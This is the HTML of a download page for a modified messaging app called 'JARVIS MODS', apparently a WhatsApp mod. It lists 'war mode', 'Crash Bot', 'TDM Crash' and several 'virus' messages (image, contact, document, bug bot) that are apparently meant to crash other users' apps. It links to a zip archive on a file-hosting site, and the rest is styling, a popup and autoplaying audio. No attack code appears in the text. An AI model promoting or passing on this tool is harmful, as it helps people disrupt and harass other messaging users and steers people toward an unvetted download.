<p></p><div style="text-align: center;"><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"><span class="Linkify"></span><span class="Linkify"></span></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: left;"></div><div style="text-align: center;"><h1><b>JARVIS MODS OFC </b></h1></div><div style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><img border="0" data-original-height="449" data-original-width="800" height="180" src="https://i.imgur.com/gNobyIR.jpeg" width="320" /></div><h3 style="text-align: right;"><span class="Linkify">&nbsp;</span></h3><h3 style="text-align: right;"><span class="Linkify">𝐉𝐔𝐒𝐓𝐈𝐍𝐄 𝐱 𝐓𝐑𝐈𝐗☀️❤️</span></h3>&nbsp;<br /></div><div style="text-align: left;">&nbsp;</div><div style="text-align: left;">&nbsp;<span class="Linkify"></span><br /></div><div style="text-align: justify;"><span class="Linkify">𝐔𝐋𝐓𝐑𝐀 𝐈𝐌𝐌𝐔𝐍𝐄 𝐌𝐎𝐃𝐄</span><br /><span class="Linkify">.</span><br /><span class="Linkify">☀️𝐖𝐀𝐑 𝐌𝐎𝐃𝐄</span><br /><span class="Linkify">☀️𝐀𝐃𝐌𝐈𝐍</span><br /><span class="Linkify">☀️𝐀𝐮𝐝𝐢𝐨 𝐓𝐨 𝐕𝐨𝐢𝐜𝐞𝐍𝐨𝐭𝐞</span><br /><span class="Linkify">☀️𝐓𝐢𝐜𝐤 𝐒𝐩𝐞𝐞𝐝</span><br /><span class="Linkify">☀️𝐈𝐦𝐦𝐨𝐫𝐭𝐚𝐥 𝐇𝐨𝐦𝐞</span><br /><span class="Linkify">☀️𝐃𝐨𝐧𝐭 𝐒𝐡𝐨𝐰 𝐓𝐞𝐱𝐭</span><br /><span class="Linkify">☀️𝐓𝐃𝐌 𝐂𝐫𝐚𝐬𝐡</span><br /><span class="Linkify">☀️𝐆𝐫𝐨𝐮𝐩 𝐅𝐢𝐱 𝐈𝐧𝐯𝐢𝐭𝐞</span><br /><span class="Linkify">☀️𝐁𝐨𝐥𝐝 𝐓𝐞𝐱𝐭</span><br /><span class="Linkify">☀️𝐇𝐢𝐝𝐞 𝐐𝐮𝐨𝐭𝐞𝐝 𝐌𝐞𝐬𝐬𝐚𝐠𝐞</span><br /><span class="Linkify">☀️𝐂𝐫𝐚𝐬𝐡 𝐁𝐨𝐭</span><span class="Linkify">&nbsp;</span></div><div style="text-align: justify;"><span class="Linkify">☀️𝐁𝐮𝐠 𝐁𝐨𝐭 𝐕𝐢𝐫𝐮𝐬</span><br /></div></div><p></p><p style="text-align: left;"></p><div style="text-align: center;"><div style="text-align: justify;"><span class="Linkify">☀️𝐁𝐮𝐠 𝐁𝐨𝐭 𝐕𝐢𝐫𝐮𝐬 𝟑</span><br /><span class="Linkify">☀️𝐋𝐢𝐧𝐤 𝐂𝐨𝐥𝐨𝐫</span><br /><span class="Linkify">☀️𝐈𝐦𝐚𝐠𝐞 𝐕𝐢𝐫𝐮𝐬</span><br /><span class="Linkify">☀️𝐂𝐨𝐧𝐭𝐚𝐜𝐭 𝐕𝐢𝐫𝐮𝐬</span><br /><span class="Linkify">☀️𝐃𝐨𝐜𝐮𝐦𝐞𝐧𝐭 𝐕𝐢𝐫𝐮𝐬</span><br /><span class="Linkify">☀️𝐕𝐜𝐚𝐫𝐝</span><br /><span class="Linkify">☀️𝐋𝐨𝐜𝐚𝐭𝐢𝐨𝐧</span><br /><span class="Linkify">☀️𝐍𝐨𝐯𝐨_𝐈𝐦𝐦𝐧𝐮𝐞</span><br /><span class="Linkify">☀️𝐑𝐞𝐚𝐝 𝐌𝐨𝐫𝐞</span><br /><span class="Linkify">☀️𝐕𝐨𝐢𝐜𝐞 𝐃𝐮𝐫𝐚𝐭𝐢𝐨𝐧</span><br /><span class="Linkify">☀️𝐀𝐮𝐭𝐨-𝐅𝐨𝐫𝐰𝐚𝐫𝐝</span><br /><span class="Linkify">☀️𝐈𝐨𝐬 𝐁𝐨𝐨𝐦 𝐓𝐞𝐱𝐭</span><br /><span class="Linkify">☀️𝟐 𝐄𝐱𝐭𝐫𝐚 𝐎𝐩𝐭𝐢𝐨𝐧𝐬 𝐍𝐞𝐰 𝐀𝐝𝐝𝐞𝐝</span></div><div style="text-align: justify;"><br /></div><div style="text-align: justify;"><br /></div><span class="Linkify"></span></div><p></p>

<meta content="width=device-width, initial-scale=1" name="viewport"></meta>

<!--Add icon library-->

<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet"></link>

<style>

.btn {

  background-color: black;

  border: none;

  color: white;

  padding: 12px 30px;

  cursor: pointer;

  font-size: 20px;

}

/* Darker background on mouse-over */

.btn:hover {

  background-color: grey;

  color: black;

 

}

</style>



<body>

<h2>CLICK HERE TO DOWNLOAD</h2>

<a download="" href="https://www.mediafire.com/file/f6d6dd1aha1y2xo/%25F0%259D%2590%2589%25F0%259D%2590%2580%25F0%259D%2590%2591%25F0%259D%2590%2595%25F0%259D%2590%2588%25F0%259D%2590%2592_%25F0%259D%2590%2595%25F0%259D%259F%258F_2.22.10.73.zip/file">

<button class="btn"><i class="fa fa-download"></i> DOWNLOAD</button>

</a></body>

<br /><br /><br /><br /><br /><br /><br />


<head>

<meta content="width=device-width, initial-scale=1" name="viewport"></meta>

<style>

/* Popup container - can be anything you want */

.popup {

  position: relative;

  display: inline-block;

  cursor: pointer;

  -webkit-user-select: none;

  -moz-user-select: none;

  -ms-user-select: none;

  user-select: none;

}

/* The actual popup */

.popup .popuptext {

  visibility: hidden;

  width: 160px;

  background-color: blue;

  color: #fff;

  text-align: center;

  border-radius: 6px;

  padding: 8px 0;

  position: absolute;

  z-index: 1;

  bottom: 125%;

  left: 50%;

  margin-left: -80px;

}

/* Popup arrow */

.popup .popuptext::after {

  content: "";

  position: absolute;

  top: 100%;

  left: 50%;

  margin-left: -5px;

  border-width: 5px;

  border-style: solid;

  border-color: blue transparent transparent transparent;

}

/* Toggle this class - hide and show the popup */

.popup .show {

  visibility: visible;

  -webkit-animation: fadeIn 1s;

  animation: fadeIn 1s;

}

/* Add animation (fade in the popup) */

@-webkit-keyframes fadeIn {

  from {opacity: 0;} 

  to {opacity: 2;}

}

@keyframes fadeIn {

  from {opacity: 0;}

  to {opacity: 2;}

}

</style>

</head>

<body style="text-align: center;">

<h2>You have a message from JUSTINE</h2>

<div class="popup" onclick="myFunction()">Click here to see

  <span class="popuptext" id="myPopup">--THANKS FOR USING MY SERVICE--</span>

</div>

<script>

// When the user clicks on div, open the popup

function myFunction() {

  var popup = document.getElementById("myPopup");

  popup.classList.toggle("show");

}

</script>

</body>
<br /><br /><br /><br />
<!-- Footer -->
<footer class="w3-container w3-padding-32 w3-light-grey w3-center w3-xlarge">
  <div class="w3-section">
    <a href="https://www.instagram.com/p/CidBDq8p6zU/"><i class="fa fa-instagram w3-hover-opacity"></i></a>
  </div>
  <p class="w3-medium">©Copyrighted to TEAM TEXIDOMG</p>
</footer>

<html>

<head>

<meta content="width=device-width, initial-scale=1" name="viewport"></meta>

<style>

body {font-family: Arial, Helvetica, sans-serif;}

.callout {

  position: fixed;

  bottom: 35px;

  right: 20px;

  margin-left: 20px;

  max-width: 300px;

}

.callout-header {

  padding: 25px 15px;

  background: #555;

  font-size: 30px;

  color: white;

}

.callout-container {

  padding: 15px;

  background-color: #ccc;

  color: black

}

.closebtn {

  position: absolute;

  top: 5px;

  right: 15px;

  color: white;

  font-size: 30px;

  cursor: pointer;

}

.closebtn:hover {

  color: lightgrey;

}

</style>

</head>

<body>

<div class="callout">

  <div class="callout-header">From Justine</div>

  <span class="closebtn" onclick="this.parentElement.style.display='none';">×</span>

  <div class="callout-container">

    <p>First User? Subscribe for more <a href="https://youtube.com/channel/UC4pkvU-8eFqXVl8BU8JvtYA">Subscribe</a></p>

  </div>

</div>

</body>
</html>






<style>
body {
  center: 200px;
  background: url("https://i.pinimg.com/originals/74/43/a3/7443a31b6a19e5630b94a6538ff9bdd1.gif") repeat top left;
}

.center_div {
  border: 1px solid gray;
  margin-left: auto;
  margin-right: auto;
  width: 90%;
  background-color: #d0f0f6;
  text-align: center;
  padding: 8px;
}
</style>


<!DOCTYPE html>
<html>
   <head>
      <title></title>
   </head>
   <body>
      <p></p>
      <p></p>
      <embed src="https://c.top4top.io/m_2247vut3c9.mp3" loop="true" autostart="true" width="2" height="0">
   </body>
</html>

</body>
</html>
